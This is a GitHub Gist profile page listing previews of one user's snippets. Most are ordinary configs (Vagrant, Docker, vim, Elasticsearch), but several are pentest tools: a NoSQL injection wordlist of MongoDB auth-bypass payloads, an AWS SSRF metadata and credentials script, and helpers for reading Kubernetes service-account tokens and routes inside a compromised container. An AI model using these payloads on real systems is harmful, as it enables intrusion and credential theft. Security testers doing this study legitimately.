Skip to content

Instantly share code, notes, and snippets.

View mohclips's full-sized avatar

mohclips mohclips

View GitHub Profile
@mohclips
mohclips / meta.sh
Last active April 4, 2024 23:02
AWS SSRF metadata and creds
#!/bin/bash
get_key_value() {
echo "$1" | grep "$2" | cut -d ':' -f 2 | cut -d '"' -f 2
}
strip_az_suffix() {
echo "$1" | sed -e 's![a-z]$!!'
}
@mohclips
mohclips / mohclips-nosqli.txt
Created January 6, 2024 20:46
NoSQL injection wordlist
$gt
$ne
$nin
$where: '1 == 1'
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
' || 'a'=='a
' } ], $comment:'successful MongoDB injection'
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
@mohclips
mohclips / Vagrantfile
Created July 29, 2022 07:56
Vagrantfile - enable VirtualBox VNC
# add this to your Vagrantfile
config.vm.provider "virtualbox" do |vb|
vb.customize ["modifyvm", :id, "--vrde", "on"]
vb.customize ["modifyvm", :id, "--vrdeaddress", "0.0.0.0"]
# pick an unused port
vb.customize ["modifyvm", :id, "--vrdeport", "60101"]
# check first with "vboxmanage list extpacks"
vb.customize ["modifyvm", :id, "--vrdeextpack", "VNC"]
# change this cleartext password to something better ;)
@mohclips
mohclips / def_route.sh
Created March 22, 2022 10:50
default route in bash
# try to use the least complex commands available in bash to get the default route
# used when ip r, ifconfig are not available
# like when in a compromised container :)
printf '%d.%d.%d.%d\n' $(echo $(cat /proc/net/route | grep "00000000.*00000000" | cut -b15-22 | grep -o .. | tac | paste -sd '' -) | sed 's/../0x& /g')
@mohclips
mohclips / test_token.sh
Created February 28, 2022 23:26
test a container jwt token for capabilities
#!/bin/bash
# test a containers service account token -rough-as-f but works
CA="/run/secrets/kubernetes.io/serviceaccount/ca.crt" # container level
TOKEN="/var/run/secrets/kubernetes.io/serviceaccount/token"
if [ ! -r $TOKEN ] ; then
echo "ERROR: no token at $TOKEN"
exit 1
#!/bin/bash
#FIELD: hostPID <boolean>
#DESCRIPTION:
# Use the host's pid namespace. Optional: Default to false.
#FIELD: privileged <boolean>
#DESCRIPTION:
# Run container in privileged mode. Processes in privileged containers are
# essentially equivalent to root on the host. Defaults to false.
@mohclips
mohclips / jwt-decode.sh
Created February 27, 2022 21:05
pull apart kubernetes jwt tokens
#!/bin/bash
assert() { if [[ $1 != $2 ]]; then echo "assert" $3; exit; fi }
decodeJWT() {
jwt=$1
# trick from https://gist.github.com/rolandyoung/176dd310a6948e094be6#file-verifytoken-sh
# basically the token is split with a '.' delimeter
input=${jwt%.*} # delete shortest match of substr from back of str
encHdr=${input%.*} # delete shortest match of substr from back of str
@mohclips
mohclips / Dockerfile
Last active February 12, 2022 15:57
prometheus snmp_exporter config for draytek routers
# define for base image download
ARG ARCH="amd64"
ARG OS="linux"
FROM quay.io/prometheus/busybox-${OS}-${ARCH}:latest
LABEL maintainer="The Prometheus Authors <[email protected]>"
# Basic security
# Create a group and user
RUN addgroup -S appgroup && adduser -S appuser -G appgroup
@mohclips
mohclips / .vimrc
Created January 15, 2022 23:19
vimrc
" Tell vim to remember certain things when we exit
" '10 : marks will be remembered for up to 10 previously edited files
" "100 : will save up to 100 lines for each register
" :20 : up to 20 lines of command-line history will be remembered
" % : saves and restores the buffer list
" n... : where to save the viminfo files
set viminfo='10,\"100,:20,%,n~/.viminfo
set paste
set laststatus=2
@mohclips
mohclips / get-simple-template.sh
Created March 20, 2021 17:15
Get a simplistic view of an ElasticSearch template
#!/bin/bash
ES="192.168.0.2:9200"
INDEX="stats-000001"
curl -s -XGET "http://$ES/$INDEX/_mapping " |\
jq -r --arg INDEX "$INDEX" '.[$INDEX].mappings.properties |
[leaf_paths as $path |
{"key": $path | join("."), "value": getpath($path)}] |